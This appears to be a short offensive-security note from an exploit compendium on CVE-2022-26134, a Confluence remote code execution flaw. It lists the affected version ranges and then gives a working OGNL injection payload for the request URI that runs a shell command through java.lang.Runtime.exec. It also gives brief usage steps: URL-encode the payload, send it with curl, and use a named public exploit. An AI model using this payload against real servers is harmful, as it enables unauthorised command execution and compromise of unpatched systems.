killchain-compendium/exploit/java/OGNL/cve_2022_26134.md

CVE-2022-26134

• NIST CVE-2022-26134
• Confluence versions:
  • 1.3.0 to 7.4.17
  • 7.13.0 to 7.13.7
  • 7.14.0 to 7.14.3
  • 7.15.0 to 7.15.2
  • 7.16.0 to 7.16.4
  • 7.17.0 to 7.17.4
  • 7.18.0 to 7.18.1
• Object Graph Navigation Language (OGNL)

Usage

• Payload is a GET request which is set via the URI

 ${@java.lang.Runtime@getRuntime().exec("touch /tmp/exploit")}/

• URL encode and curl for PoC

• Use Naqwda's exploit